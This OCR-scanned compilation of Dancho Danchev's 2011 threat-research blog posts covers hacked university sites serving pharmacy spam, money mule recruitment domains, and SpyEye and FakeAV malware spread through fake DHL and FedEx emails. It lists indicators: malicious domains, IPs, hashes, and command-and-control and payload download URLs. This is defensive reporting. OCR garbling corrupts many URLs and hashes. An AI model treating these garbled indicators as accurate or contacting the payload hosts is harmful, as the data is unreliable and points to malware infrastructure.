15. http://www.zdnet.com/blo a /securit v/a oo a le-intros- 
advanced-si a n-in-feature/8137 

16. http://www.zdnet.com/blo a /securitv/malware-watch- 
u psfdic-mobile-a p p-infected-ambulance-dispatch/8151 

17. http://www.zdnet.com/blo a /securitv/report-patched- 
vulnerabi8iti!es-remain-prime-exploitation-vector/8162 

18. http://www.zdnet.com/blo a /securitv/bo a us-android- 
ap ps-lead-to-mal ware/8212 









































































19. http://www.zdnet.com/blo a /securitv/zeus-crimeware- 
variant-tar a ets-svmbian-and-blackberrv-users/8231 

20. http://www.zdnet.com/blo a /securitv/researchers-soot- 
new-mac-os-x-mal ware/8241 

21. http://ddanchev.blo as pot.com/ 

22. http://twitter.com/danchodanchev 
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Compromised University Leads to Fraudulent Google 
Brand-jacked Pharmaceutical Ads (2011-03-07 14:08) 

[1] 

An 

exploited 

web 

application 

vulnerability 

within 


Cochise 

















County 

Online 


University 

CMS 

(moo- 

dle.cochise.az.gov/user), is currently resulting in a 
blackhat SEO campaign (1,890 pages) leading to 
fraudulent Google brand-jacked pharmaceutical pages. 

Naturally, once the compromise took place, the 
cybercriminals started considering the blackhat SEO 
content 

farm themed for pharmaceutical scams, as parts of their 
infrastructure and spamvertised links to it across multiple 

web forums. 

[ 2 ] 
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Ther redirection chain is as follows: 

- moodle.cochise.az.gov/user - random pharmaceutical 
content 

- goodmedk.com 

- gooqpilly.com 


- 50.22.28.50 


goodmedk.com/whftltyixallwke6hoqstgzsiq.html - 

77.67.80.48, AS3257 - Email: jognbroownn@usa.com 

goodmedk.com/kavglmapejes7bdfg6mf8d.py 

goodmedk.com/hxinlaresbnzbikmnatmck.py 

goodmedk.com/huvtleikspann6hoqstgzsiq.html 

goodmedk.com/txajlatev0egij9pi-g. pi 

goodmedk.com/tldhlaoet8cegh7ng9e.html 

[3] 

Redirectors used: 
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gooqpilly.com - 77.67.80.42, AS3257 - Email: 
jognbroownn@usa.com 

50.22.28.50/c.php - 50.22.28.50- 

static, reverse.softlayer.com 

[4] 

Redirects to the following currently active fraudulent online 
pharmacies: 

pillshealthmedsplus.net - 89.114.9.82 - Email: 
acquit@bz3.ru 

allrxtabs.com - 91.212.135.69 - Email: 
rxrevenue@gmail.com 


canadianselect.net - 89.149.196.197 - Email: 
canadianselect.net@protecteddomainservices.com 

worldselectshop.com - 95.211.1.82 - Email: 
worldselectshop.com@protecteddomainservices.com 

generic-pills-online.eu - 95.163.15.207 

menhealth-pharmacy.co.uk - 109.237.213.194 

4rx.com - 174.127.67.233 - Email: webmaster@4rx.com 

The hijacking of a trusted brand such as Google shouldn't 
be surprising, as it's an inseparable part of social en¬ 
gineering driven abuse of the trust-chain. From Google's 
name to the visual impersonation of Google Search this 

campaign demonstrates exactly the same. 

This post has been reproduced from [5]Dane ho 
Danchev's blog. Follow him [6]on Twitter. 

1. https://lh5. a oo a leusercontent.com/- 
FaZm5Nia4mo/TXTAssw6EUI/AAAAAAAAElo/8G- 

6ee31FHI/sl600/Goo a le Health pha 

rmaceutical.PNG 
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2. https://lh4. a oo a leusercontent.com/-YP4- 
kl DQSwl/TXTGUU0vlKI/AAAAAAAAEls/fvkF905waTM/sl6Q 
0/Fake Goo a le Healt 


h pharmaceutical spamvertised links.PNG 



















3. 

https://lh5. a oo a leusercontent.com/-4DvwYszzZvA/TXTHklXlf 
QI/AAAAAAAAElw/UA2AKPC8CM8/sl600/Fake Goo a le Heal 
t 

h pharmaceutical .PNG 

4. https://lh5. a oo a leusercontent.com/- 
BPztch9 a 4Tc/TXTI I o2eCII/AAAAAAAAElQ/kX4URWeZDmk/sl 
600/fraud u I entoharma 

ceutical.PNG 

5. http://ddanchev.blo as oot.com/ 

6. http://twitter.com/danchodanchev 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Six (2011-03-10 14:45) 

[1] 

Following my previous post on "[2]Keeping Money Mule 
Recruiters on a Short Leash - Part Five", in this post 
we're once again going to expose a portfolio of money mule 
recruitment domains, their related ASs and name servers of 

notice, including some additional SpyEye activity within one 
of the ASs. 

What's particularly interesting is the ongoing use of similar 
templates, including fake "certified by" documents aiming 
to boost the visitor's confidence in the mule recruitment 
company. Sample "certified by" documents include: 56 




















K 

K 

£ 

K 

[3] 

[4] 

[5] 

[ 6 ] 
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[7] 

Money mule recruitment web sites: 

ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru - 

[8] seen here 

ANTIQUEE-CORP.INFO - Email: admin@antiquee-corp.info 

ARAMATEGROUP-INT.INFO - Email: 
admin@aramategroup-int.info 

art-marketllc.cc - Email: hear@ppmail.ru 

ARTSOLVE-LTD.AT - Email: admin@artsolve-ltd.at 

ARTSOLVELTD.CC - Email: admin@artsolveltd.ee 

artsolveltd.ee - Email: admin@artsolveltd.ee 


ARTSOLVELTDCO.AT - Email: admin@artsolveltd.cc 

artsolveltdco.at - Email: admin@artsolveltd.cc 

ASTECH-GROUPDE.CC - Email: admin@i-compass- 
group.cc 

atlant-groupinc.cc - Email: bombay@yourisp.ru - [9]seen 
here 

Atlant-usainc.net - Email: admin@atlant-usainc.net 

BREDGARCORP-ANT.BE 

CREATENCE-GROUPLLC.AT - Email: admin@creatence- 
groupllc.at 

CREATENCE-GROUPLLC.CC - Email: hunt@bz3.ru 

CREATENCEGROUP-LLC.CO - Email: px@bz3.ru 

DEVAS-LLC.CO - Email: gate@ppmail.ru 

DRYSDALE-ANTCORP.AT - Email: admin@drysdale- 
antcorp.at 

DRYSDALE-ANTCORP.BIZ - Email: admin@drysdale- 
antcorp.biz 

DRYSDALE-GROUP-INC.CC - Email: atomic@bz3.ru 

DUNCROFT-ANTTEAM.ORG - Email: admin@drysdale- 
antcorp.biz 

FINTEC-UKLTD.WS 


fintec-ukltd.ws 



fourthgroup-ltd.cc - Email: rots@cheapbox.ru 

generalabbrialgroup-ltd.net - Email: 
admin@generalabbrialgroup-ltd.net 

generation-groupltd.cc - Email: jz@ppmail.ru 

l-COMPASS-GROUP.AT - Email: admin@i-compass-group.at 

katemdutkins.co.cc 

LILAC-GROUPLLC.CC - Email: lane@free-id.ru 

LILACGROUP-LLC.CO - Email: baggy@bz3.ru 

MIMOSA-INCGROUP.INFO - Email: admin@mimosa- 
incgroup.info 

moneyvisual-ukllc.com - Email: admin@moneyvisual- 
ukllc.com 

nimrodltd-uk.net - Email: admin@nimrodltd-uk.net 
OLIVER-ANTCORP.NET - Email: admin@oliver-antcorp.net 
qead-groupllc.net - Email: admin@qead-groupllc.net 

renaissancellc.be 
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renaissancellc.be 

renaissance-llc.cc - Email: admin@renaissance-llc.cc 

ROYALTHELMAS-GROUP-LLC.CC - Email: zap@ca4.ru 


ROYALTHELMAS-TEAMANT.ASIA - Email: 
admin@royalthelmas-teamant.asia 

SCHWARTZBROTHERSANT-CORP.COM - Email: 
admin@schwartzbrothersant-corp.com 

STRATEGICGROUP-LLC.CO - Email: flute@free-id.ru 

THRONE-GROUPLLC.CC - Email: lane@free-id.ru 

THRONEGROUP-LLC.CO - Email: floyd@ca4.ru 

THRONE-UK.AT - Email: admin@throne-uk.at 

TINASSANSERVICEANT-ANTTEAM.NET - Email: 
admin@tinassanserviceant-antteam.net 

TINASSANSERVICE-GROUPLLC.CC - Email: 
six@yourisp.ru 

westerntrust.co.uk 

westview-art.net - Email: admin@westview-art.net 
[ 10 ] 

Domains responding to: 

78.46.105.205 -AS24940, HETZNER-AS Hetzner Online 
AG RZ 

98.141.220.116 - AS29713, INTERPLEXINC Interplex LLC. 

98.141.220.117 - AS29713, INTERPLEXINC Interplex LLC. 

114.207.244.143 - AS9318, HANARO-AS Hanaro Telecom 
Inc. 



114.207.244.144 - AS9318, HANARO-AS Hanaro Telecom 
Inc. 

114.207.244.145 - AS9318, HANARO-AS Hanaro Telecom 
Inc. 

114.207.244.146 - AS9318, HANARO-AS Hanaro Telecom 
Inc. 

193.105.134.230 - AS42708, PORTLANE Network 

193.105.134.231 - AS42708, PORTLANE Network 
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193.105.134.232 - AS42708, PORTLANE Network 

193.105.134.233 - AS42708, PORTLANE Network 

193.105.134.234 - AS42708, PORTLANE Network 

195.182.57.84 - AS47311, Cerannics-AS Cerannics lip 

195.182.57.91 - AS47311, Cerannics-AS Cerannics lip 

204.45.118.54 - 204.45.118.48/29/INSIGHT- 
INVESTMENTS-LLC 

More malicious activity within [ll]AS24940 f HETZNER-AS 
Hetzner Online AG RZ, courtesy of the SpyEye tracker: 

188.40.198.185 

188.40.87.88 

www.privathosting.eu 


spl.privathosting.eu 

46.4.194.162 

188.40.87.91 

88.198.36.61 

[ 12 ] 

Name servers of notice: 

nsl.uknamo.com - 69.10.44.188 - Email: 
morph@ppmail.ru 

ns2.uknamo.com - 178.162.181.11 
60 

ns3.uknamo.com - 66.199.236.116 

nsl.ukansnami.com - 178.162.181.11 - Email 
glide@yourisp.ru 

ns2.ukansnami.com - 178.162.181.11 

ns3.ukansnami.com - 66.199.236.117 

ns3.dnsukrect.com - 66.199.236.118 - Email: 
code@yourisp.ru 

NS1.LIBUNITAU.CC - 178.162.152.76 - Email: 
ached@yourisp.ru - [13]seen here 

NS2.LIBUNITAU.ee - 66.199.236.115 

NS3.LIBUNITAU.ee - 178.162.181.11 



NS1.AUSTDEC.CC - 178.162.152.75 - Email: 
bold@yourisp.ru - [14]seen here 

NS2.AUSTDEC.CC - 66.199.236.114 

NS3.AUSTDEC.CC - 178.162.181.11 

NSl.SURPLUSUSA.ee - 209.159.156.162 - Email: 
skulk@ppmail.ru - [15]seen here 

NS2.SURPLUSUSA.Ce - 76.73.47.26 

NS3.SURPLUSUSA.Ce - 69.50.192.97 

NSl.USABONDS.ee - Email: bart@cheapbox.ru - [16]seen 
here 

NS2.USABONDS.ee 

NS3.USABONDS.eC 

The cybercriminals have also switched from using unique 
emails for registrations to default admin@money- 

mule-recruitment domain type of structure. Monitoring of 
their money mule recruitment activities is ongoing. 

Related posts: 

[17] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 

[18] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[19] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 



[20] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[21] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[22] Money Mule Recruiters on Yahool's Web Hosting 

[23] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[24] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[25] Keeping Reshipping Mule Recruiters on a Short Leash 

[26] Keeping Money Mule Recruiters on a Short Leash 

[27] Standardizing the Money Mule Recruitment Process 

[28] lnside a Money Laundering Group's Spamming 
Operations 

[29] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[30] Money Mules Syndicate Actively Recruiting Since 2002 

This post has been reproduced from [31]Dancho 
Danchev's blog. 

1. https://lh6. a oo a leusercontent.com/- 

xBh63uCpBLc/TXeafmi8zfl/AAAAAAAAE14/9TzxHbToRxs/sl 

600/monev_mule_recrui 


tment March 2010 2. pna 










2. http://ddanchev.blo as DOt.com/2011/Ql/keepin a -mone v- 
mule-recruiters-on-short.html 

3. https://lh6. a oo a leusercontent.com/- 
vtOvehfM5YY/TXeeXO dl 75l/AAAAAAAAE2E/RLzXha ka a3U/sl 
600/SteinQls. ipg 

4. https://lh3. a oo a leusercontent.com/- 

Piw2e vl P5M/TXeealAFval/AAAAAAAAE2l/x8uW pLa AL9M/sl 
600/Stein02s. ipa 

5. https://lh4. a oo a leusercontent.com/- 

ZK7CaY S8r8/TXeedmFvOUI/AAAAAAAAE2M/ a ltlLo6eOWU/ 
sl600/Stein03s. ipa 

6. https://lh4. a oo a leusercontent.com/- 
s6ava3Lo2 pQ /TXee a noOBvl/AAAAAAAAE20/liAdYPF Ix- 
U/sl600/Stei n04s. jpg 

7. 

https://lh6. a oo a leusercontent.com/-9FGZhnmN5fl/TXeekB a 
g vbl/AAAAAAAAE2U/K8KnF Ple4k/sl600/Stein05s. ifog 

8. http://ddanchev.blo as pot.com/2011/Ql/keepin a -mone v- 
mule-recruiters-on-short.html 

9. http://ddanchev.blo as pot.com/2011/Ql/keepin a -mone v- 
mule-recruiters-on-short.html 

10 . 

https://lh6. a oo a leusercontent.com/- 

moHbHvr78Hc/TXecvhHkp6l/AAAAAAAAE18/dk563 I Azcv a/s 

1600/monev_mule_recr 
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11. https://s pve vetracker.abuse.ch/monitor. ph p7as-24940 

12 . 

https://lh4. a oo a leusercontent.com/- 
flfMo oGl s/TXedtNxlHtl/AAAAAAAAE2A/d- 

zWBtuOXoY/sl600/monev_mule_recr 

uitment March 2010 B. ona 

13. http://ddanchev.blo as pot.com/2Qll/01/keeoin a -mone v- 
mule-recruiters-on-short.html 

14. http://ddanchev.blo as pot.com/2Qll/Ql/keeoin a -mone v- 
mule-recruiters-on-short.html 


15. http://ddanchev.blo as oot.com/2Qll/Ql/keepin a -mone v- 
mule-recruiters-on-short.html 


16. http://ddanchev.blo as pot.com/2011/Ql/keeoin a -mone v- 
mule-recruiters-on-short.html 


17. http://ddanchev.blo as pot.com/2011/Ql/keeoin a -mone v- 
mule-recruiters-on-short.html 


18. http://ddanchev.blo as oot.com/2QlQ/Q4/dns- 
infrastructure-Qf-monev-mule.html 

19. http://ddanchev.blo as pot.com/2Q10/Q4/keeoin a -mone v- 
mule-recruiters-on-short.html 


20. http://ddanchev.blo as pot.com/2010/Q3/monev-mule- 
recruitment-camoai a n-servin a .html 

21. http://ddanchev.blo as pot.com/201Q/Q3/keeoin a -mone v- 
mule-recruiters-on-short.html 



















































22. http://ddanchev.blo as pot.com/2010/Q3/monev-mule- 
recruiters-on-vahoos-web.html 

23. http://ddanchev.blo as pot.com/2010/Q2/dissectin a- 
ona oin a -monev-mule.html 

24. http://ddanchev.blo as pot.com/2010/Q2/keepin a -mone v- 
mule-recruiters-on-short.html 


25. http://ddanchev.blo as pot.com/20Q9/12/keepin a- 
reshi p pin a -mule-recruiters-on.html 

26. http://ddanchev.blo as pot.com/20Q9/ll/keepin a -mone v- 
mule-recruiters-on-short.html 


27. http://ddanchev.blo as pot.com/20Q9/10/standardizin a- 
monev-mule-recruitment.html 

28. http://ddanchev.blo as pot.com/2009/Q5/inside-mone v- 
launderin a-a roups-spammin a .html 

29. http://ddanchev.blo as pot.com/2008/Q7/monev-mule- 
recruiters-use-asproxs-fast.html 

30. http://ddanchev.blo as pot.com/20Q8/10/monev-mules- 
s vndicate-activelv.html 

31. http://ddanchev.blo as pot.com/ 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Six (2011-03-10 14:45) 


[ 1 ] 















































Following my previous post on "[2]Keeping Money Mule 
Recruiters on a Short Leash - Part Five", in this post 
we're once again going to expose a portfolio of money mule 
recruitment domains, their related ASs and name servers of 

notice, including some additional SpyEye activity within one 
of the ASs. 

What's particularly interesting is the ongoing use of similar 
templates, including fake "certified by" documents aiming 
to boost the visitor's confidence in the mule recruitment 
company. Sample "certified by" documents include: 63 
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[3] 

[4] 

[5] 

[ 6 ] 
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[7] 

Money mule recruitment web sites: 

ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru - 

[8] seen here 


ANTIQUEE-CORP.INFO - Email: admin@antiquee-corp.info 

ARAMATEGROUP-INT.INFO - Email: 
admin@aramategroup-int.info 

art-marketllc.cc - Email: hear@ppmail.ru 

ARTSOLVE-LTD.AT -Email: admin@artsolve-ltd.at 

ARTSOLVELTD.CC - Email: admin@artsolveltd.ee 

artsolveltd.ee - Email: admin@artsolveltd.ee 

ARTSOLVELTDCO.AT - Email: admin@artsolveltd.ee 

artsolveltdco.at - Email: admin@artsolveltd.ee 

ASTECH-GROUPDE.CC - Email: admin@i-compass- 
group.ee 

atlant-groupine.ee - Email: bombay@yourisp.ru - [9]seen 
here 

Atlant-usainc.net - Email: admin@atlant-usainc.net 

BREDGARCORP-ANT.BE 

CREATENCE-GROUPLLC.AT - Email: admin@creatence- 
groupllc.at 

CREATENCE-GROUPLLC.CC - Email: hunt@bz3.ru 

CREATENCEGROUP-LLC.CO - Email: px@bz3.ru 

DEVAS-LLC.CO - Email: gate@ppmail.ru 

DRYSDALE-ANTCORP.AT - Email: admin@drysdale- 
antcorp.at 



DRYSDALE-ANTCORP.BIZ - Email: admin@drysdale- 
antcorp.biz 

DRYSDALE-GROUP-INC.CC - Email: atomic@bz3.ru 

DUNCROFT-ANTTEAM.ORG - Email: admin@drysdale- 
antcorp.biz 

FINTEC-UKLTD.WS 

fintec-ukltd.ws 

fourthgroup-ltd.cc - Email: rots@cheapbox.ru 

generalabbrialgroup-ltd.net - Email: 
admin@generalabbrialgroup-ltd.net 

generation-groupltd.cc - Email: jz@ppmail.ru 

l-COMPASS-GROUP.AT - Email: admin@i-compass-group.at 

katemdutkins.co.ee 

LILAC-GROUPLLC.CC - Email: lane@free-id.ru 

LILACGROUP-LLC.CO - Email: baggy@bz3.ru 

MIMOSA-INCGROUP.INFO - Email: admin@mimosa- 
incgroup.info 

moneyvisual-ukllc.com - Email: admin@moneyvisual- 
ukllc.com 

nimrodltd-uk.net - Email: admin@nimrodltd-uk.net 
OLIVER-ANTCORP.NET - Email: admin@oliver-antcorp.net 
qead-groupllc.net - Email: admin@qead-groupllc.net 



renaissancellc.be 
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renaissancellc.be 

renaissance-llc.cc - Email: admin@renaissance-llc.ee 

ROYALTHELMAS-GROUP-LLC.CC - Email: zap@ca4.ru 

ROYALTHELMAS-TEAMANT.ASIA - Email: 
admin@royalthelmas-teamant.asia 

SCHWARTZBROTHERSANT-CORP.COM - Email: 
admin@schwartzbrothersant-corp.com 

STRATEGICGROUP-LLC.CO - Email: flute@free-id.ru 

THRONE-GROUPLLC.CC - Email: lane@free-id.ru 

THRONEGROUP-LLC.CO - Email: floyd@ca4.ru 

THRONE-UK.AT - Email: admin@throne-uk.at 

TINASSANSERVICEANT-ANTTEAM.NET - Email: 
admin@tinassanserviceant-antteam.net 

TINASSANSERVICE-GROUPLLC.CC - Email: 
six@yourisp.ru 

westerntrust.co.uk 

westview-art.net - Email: admin@westview-art.net 
[ 10 ] 

Domains responding to: 


78.46.105.205 -AS24940, HETZNER-AS Hetzner Online 
AG RZ 

98.141.220.116 - AS29713, INTERPLEXINC Interplex LLC. 

98.141.220.117 - AS29713, INTERPLEXINC Interplex LLC. 

114.207.244.143 - AS9318, HANARO-AS Hanaro Telecom 
Inc. 

114.207.244.144 - AS9318, HANARO-AS Hanaro Telecom 
Inc. 

114.207.244.145 - AS9318, HANARO-AS Hanaro Telecom 
Inc. 

114.207.244.146 - AS9318, HANARO-AS Hanaro Telecom 
Inc. 

193.105.134.230 - AS42708, PORTLANE Network 

193.105.134.231 - AS42708, PORTLANE Network 
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193.105.134.232 - AS42708, PORTLANE Network 

193.105.134.233 - AS42708, PORTLANE Network 

193.105.134.234 - AS42708, PORTLANE Network 

195.182.57.84 - AS47311, Cerannics-AS Cerannics lip 

195.182.57.91 - AS47311, Cerannics-AS Cerannics lip 

204.45.118.54 - 204.45.118.48/29/INSIGHT- 
INVESTMENTS-LLC 


More malicious activity within [ll]AS24940 f HETZNER-AS 
Hetzner Online AG RZ, courtesy of the SpyEye tracker: 

188.40.198.185 

188.40.87.88 

www.privathosting.eu 

spl.privathosting.eu 

46.4.194.162 

188.40.87.91 

88.198.36.61 

[ 12 ] 

Name servers of notice: 

nsl.uknamo.com - 69.10.44.188 - Email: 
morph@ppmail.ru 

ns2.uknamo.com - 178.162.181.11 
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ns3.uknamo.com - 66.199.236.116 

nsl.ukansnami.com - 178.162.181.11 - Email: 
glide@yourisp.ru 

ns2.ukansnami.com - 178.162.181.11 


ns3.ukansnami.com - 66.199.236.117 



ns3.dnsukrect.com - 66.199.236.118 - Email: 
code@yourisp.ru 

NS1.LIBUNITAU.CC - 178.162.152.76 - Email: 
ached@yourisp.ru - [13]seen here 

NS2.LIBUNITAU.ee - 66.199.236.115 

NS3.LIBUNITAU.ee - 178.162.181.11 

NSl.AUSTDEC.CC - 178.162.152.75 - Email: 
bold@yourisp.ru - [14]seen here 

NS2.AUSTDEC.CC - 66.199.236.114 

NS3.AUSTDEC.CC - 178.162.181.11 

NSl.SURPLUSUSA.ee - 209.159.156.162 - Email: 
skulk@ppmail.ru - [15]seen here 

NS2.SURPLUSUSA.CC - 76.73.47.26 

NS3.SURPLUSUSA.CC - 69.50.192.97 

NS1.USABONDS.CC - Email: bart@cheapbox.ru - [16]seen 
here 

NS2.USABONDS.Ce 

NS3.USABONDS.CC 

The cybercriminals have also switched from using unique 
emails for registrations to default admin@money- 

mule-recruitment domain type of structure. Monitoring of 
their money mule recruitment activities is ongoing. 


Related posts: 



[17] Keeping Money Mule Recruiters on a Short Leash - Part 
Five 

[18] The DNS Infrastructure of the Money Mule Recruitment 
Ecosystem 

[19] Keeping Money Mule Recruiters on a Short Leash - Part 
Four 

[20] Money Mule Recruitment Campaign Serving Client-Side 
Exploits 

[21] Keeping Money Mule Recruiters on a Short Leash - Part 
Three 

[22] Money Mule Recruiters on Yahool's Web Hosting 

[23] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

[24] Keeping Money Mule Recruiters on a Short Leash - Part 
Two 

[25] Keeping Reshipping Mule Recruiters on a Short Leash 

[26] Keeping Money Mule Recruiters on a Short Leash 

[27] Standardizing the Money Mule Recruitment Process 

[28] lnside a Money Laundering Group's Spamming 
Operations 

[29] Money Mule Recruiters use ASProx's Fast Fluxing 
Services 

[30] Money Mules Syndicate Actively Recruiting Since 2002 
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Spamvertised DHL Notification Malware Campaign 
(2011-03-10 15:29) 

[1] 

A currently spamvertised malware campaign is brand- 
jacking DHL for malware-serving purposes. 

Sample filename: document.zip => DHL_notification.exe 

Sample message: Dear customer. The parcel was send 
your home address. And it will arrice within 7 bussness day. 

More information and the tracking number are attached in 
document below. Thank you. 2011 DHL International 

GmbH. AH rights reserverd - notice the typo. 

DHL_notification.exe - [2]Trojan-Spy.Win32.SpyEyes - 
Result: 27 /43 (62.8 %) 

MD5 : bda72e57d263241d52blfe2ef014cba9 

SHA1 : fa9dcl4bl00flbf5124cd23c322cl09b38a70675 

SHA256: 

199f2357c24e71d955a4e6c2d07645aa04d9474e0c8c914a 

Iedd69a02e3f8a70 

Upon execution phones back to: 

adobe.com/geo/productid.php 


elsoplongt.com/rk',jopbh/qwq - Email: 
redaccion@elsoplongt.com 

accuratefiles.com/rk',jopbh/qwq 

lulango.com/rk',jopbh/qwq - Email: lulango@gmail.com 

erherg34gsafwe.com/xgate.php - AS49469, Email: 
admin@erherg34gsafwe.com 

- erherg34gsafwe.com/ftp/base.bin 

- erherg34gsafwe.com/ftp/ftpplug2.dll 

- erherg34gsafwe.com/ftp/base.bin 

Domains responding to: 

192.150.16.117 

72.41.115.170 

74.117.180.216 

87.106.193.21 

94.63.244.56 

This post has been reproduced from [3]Dancho 
Danchev's blog. 
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2 . 
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id=199f2357c24e71d955a4e6c2d07645aa04d9474e0c8c9 

14aledd69 

a02e3f8a70-1299762101 
3. http://ddanchev.blo as oot.com/ 
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Compromised University Leads to Fraudulent 
Pharmaceutical Ads (2011-03-10 16:53) 

[1] 

Continuing the [2]Compromised University Leads to 
Fraudulent Google Brand-jacked Pharmaceutical Ads 

series, 

yet another university has been compromised by 
pharmaceutical scammers, [3]part of an affiliate 
network. 

In this very latest example of this tactic, seeking to abuse 
the high pagerank of the web site in question, the 

web site of the Department of Mathematics at Rutgers 
University (math.rutgers.edu/mdnews/) appears to have 

been compromised by pharmaceutical scammers. 

Included URLs: 

math.rutgers.edu/mdnews/levitraline.html 

math.rutgers.edu/mdnews/levitrastory.html 









math.rutgers.edu/mdnews/cialis-pills.html 

math.rutgers.edu/mdnews/levitradosage.html 

math.rutgers.edu/mdnews/viagra-buy-online.html 

[4] 
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Redirects to: 

worldselectshop.com/?id=abamos - 95.211.1.82 - 
Email: worldselectshop.com@protecteddomainservices.com 

The same affiliate ID is also active at: 

usadrugstorenow.com/products/diflucan.htm? 

id=abamos 

212.117.185.19 

Email: 

usadrugstorenow.com@protecteddomainservices.com 

This post has been reproduced from [5]Dane ho 
Danchev's blog. 
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More Spamvertised DHL Notifications Spread 
Malware (2011-03-11 15:31) 

[1] 

Yesterday's campaign is still ongoing, with new MD5's in the 
wild. Here are the details. 

Sample subjects: DHL notification #random number 

Sample message: Dear customer! The parcel was send 
your home address. And it will arrice within 7 bussness day. 

More information and the tracking number are attached in 
document below. Thank you. 2011 DHL International 


GmbH. All rights reserverd. 

























Sample filenames: DHL_tracking.zip; doc.zip 

doc.exe - [2]Trojan-Spy.SpyEy!IK - Result: 18/ 43 (41.9 %) 

MD5: 83db662187dd7cd58fc4a368ea27775d 

SHA1 : 4edb2d95c0570a36f6cb992e55111cdd7c3eda69 

SHA256: 

99fle003bbfl025b0bbe257ece65dl704852fdlba48e6cc79 

bd39cde6e6dl4c3 

DHL_tracking.exe - [3]Win-Trojan/Spyeyes.45568 - 

Result: 29/43 (67.4 %) 

MD5 : 81fc09b014617bce59f678374b486512 

SHA1 : 3d92a768f58b2900b98c9f97ce2753d27a4749ae 

SHA256: 

24b23bf7ebd03bf5feb0c637eale64661e27c78c66684dd49 

f074af2b2505bb7 

Upon execution phones back to: 

adobe.com/geo/productid.php 

elsoplongt.com/rk',jopbh/qwq - Email: 
redaccion@elsoplongt.com 

accuratefiles.com/rk',jopbh/qwq 

lulango.com/rk',jopbh/qwq - Email: lulango@gmail.com 

erherg34gsafwe.com/xgate.php - AS49469, Email: 
admin@erherg34gsafwe.com 

- erherg34gsafwe.com/ftp/base.bin 



- erherg34gsafwe.com/ftp/ftpplug2.dll 

- erherg34gsafwe.com/ftp/base.bin 

Domains responding to: 

192.150.16.117 

72.41.115.170 

74.117.180.216 

87.106.193.21 

94.63.244.56 

Additional malicious activity within A549469 (SA-NOVA- 
TELECOM-GRUP-SRL 5a Nova Telecom Grup SRL, cour¬ 
tesy of the [4]ZeusTracker and the [5]SpyEye Tracker: 
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bigupdate.ru - Email: admin@hotupdaters.ru 
bigupdatings.ru - Email: admin@bigupdatings.ru 
bigupdater.ru - Email: admin@bigupdater.ru 
bigupdates.ru - Email: admin@istuplenie.ru 
bigupdating.ru - Email: admin@bigupdating.ru 
bigupdaters.ru - Email: admin@bigupdaters.ru 
94.63.244.30 

metamphcrystal.com - Email: 
admin@metamphcrystal.com 



Related malware-serving domains within A549469, 5A- 
NOVA-TELECOM-GRUP-SRL 5a Nova Telecom Grup SRL 

xppclapgirl.com - 89.114.9.33 

natnatraoi.com - 12.211.117.127 - Email: 
barbarasorber@yahoo.com 

d34ghqarfrgad.com - 94.63.244.56 - Email: 
admin@d34ghqarfrgad.com 

g3u4g.net - 89.114.9.33 - Email: 
G3U4G.NET@domainservice.com 

suhi4hr.net - 89.114.9.60 - Email: 
SUHI4HR.NET@domainservice.com 

mialedot.ru - 94.63.244.44 - Email: abuse@mialedot.ru 

blackmemoso.com - Email: grasp@yourisp.ru 

This post has been reproduced from [6]Dane ho 
Danchev's blog. 
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Spamvertised FedEx Notifications Spread Malware 
(2011-03-16 18:14) 

[1] 

A currently ongoing spamvertised campaign is brand- 
jacking FedEx for malware serving purposes. 

Sample attachments: FedEx letter.zip; FedEx letter.exe 

Sample subject: FedEx notification #random number 

Sample message: Dear customer. The parcel was sent 
your home address. And it will arrive within 7 business day. 

More information and the tracking number are attached in 
document below. 

Thank you. 


© FedEx 1995-2011 














Detection rate: FedEx letter.exe - [2]Trojan.FakeAV - 

Result: 24/43 (55.8 %) 

MD5 : 90bef5dff5809682249813fd63b67da4 

SHA1 : 2418c01a30al9a2d76b693474a852092e3de4a32 

SHA256: 

a38848786528d235b51fed3adf20050f5cl906d066e02823 

Ilb8bce37d8163a0 

Phones back to AS30890 (EVOLVA Evolva Telecom s.r.l.) 

94.63.244.56/lol2.exe 
94.63.244.56/pod.exe 

with 94.63.244.56/allftp.txt; 94.63.244.56/ftp/db 
_grab.txt hosting the sniffed FTP credentials. 

Responding to 94.63.244.56 are d34ghqarfrgad.com and 
erherg34gsafwe.com, phone back URLs which we've 

seen from last week's spamvertised DHL Notifications 
campaigns, with the use of the IP best described as a 
desperate 

attempt to maintain aC&C infrastructure: 

• [3]Spamvertised DHL Notification Malware Campaign 

• [4]More Spamvertised DHL Notifications Spread Malware 

This post has been reproduced from [5]Dane ho 
Danchev's blog. 
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2 . 
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3. http://ddanchev.blo as pot.com/2Qll/Q3/soamvertised-clhl- 
notificication-malware.html 

4. http://ddanchev.blo as pot.com/2011/Q3/more- 
s pamvertised-dhl-notifications.html 

5. http://ddanchev.blo as pot.com/ 
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Compromised Universities Leads to Fraudulent 
Pharmaceutical Ads (2011-03-16 19:30) 

[1] 

Continuing the M [2]Compromised University Leads to 
Fraudulent Pharmaceutical Ads"; "^Compromised 
University Leads to Fraudulent Google Brand-jacked 
Pharmaceutical Ads" series, in this post we'll discuss two 
more compromised web servers of educational institutions 
leading to pharmaceutical ads. Affected Universities are: 

Rutgets Energy Institute: 

ruei.rutgers.edu/documents/chin.php?adv=cialis20- 

mg 
















ruei.rutgers.edu/documents/chin.php?adv=viagra- 

ratings 

ruei.rutgers.edu/documents/chin.php?adv=viagra- 

999 

ruei.rutgers.edu/documents/chin.php?adv=viagra- 

expired 

ruei.rutgers.edu/documents/chin.php?adv=viagra- 

kako-se 

Uploaded redirectors: 

ruei.rutgers.edu/documents/chin.php 

ruei.rutgers.edu/documents/roar.php 

ruei.rutgers.edu/documents/ost.php 

Computer Music Center at Columbia University 

music. Columbia, edu/cmc/pills/index. php?adv=how-to- 
try-viagra 

music.columbia.edu/cmc/pills/index.php? 

adv=damaskviagra 
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music.columbia.edu/cmc/pills/index.php? 

adv=brandlevitra 

music.columbia.edu/cmc/pills/index.php? 
adv=vegeta Iviagra 


music. Columbia. edu/cmc/pills/index.php?adv=vviagra 
